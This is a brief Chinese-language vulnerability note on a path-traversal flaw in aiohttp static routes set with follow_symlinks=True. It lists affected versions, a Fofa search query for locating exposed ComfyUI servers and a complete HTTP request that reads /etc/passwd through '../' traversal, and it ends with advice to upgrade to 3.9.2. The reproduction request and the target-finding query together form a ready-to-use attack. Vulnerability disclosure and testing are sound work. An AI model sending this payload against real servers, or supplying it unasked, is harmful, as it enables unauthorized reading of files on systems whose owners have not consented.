0x01 漏洞描述:
aiohttp 是一个用于 asyncio 和 Python 的异步 HTTP 客户端/服务器框架。使用aiohttp作为Web服务器并配置静态路由时,需要指定静态文件的根路径。使用aiohttp实现的Web服务在 配置aiohttp中的静态资源解析时使用了不安全的参数follow_symlinks,代码如routes.static("/static", static_dir, follow_symlinks=True) 成功利用该漏洞可读取服务器上任意文件
0x02 影响版本:
1.0.5 < version < 3.9.2
0x03 搜索语句:
Fofa:title=="ComfyUI"
0x04 漏洞复现:
GET /static/../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
0x05 修复建议:
官方已在3.9.2及以上版本中修复此漏洞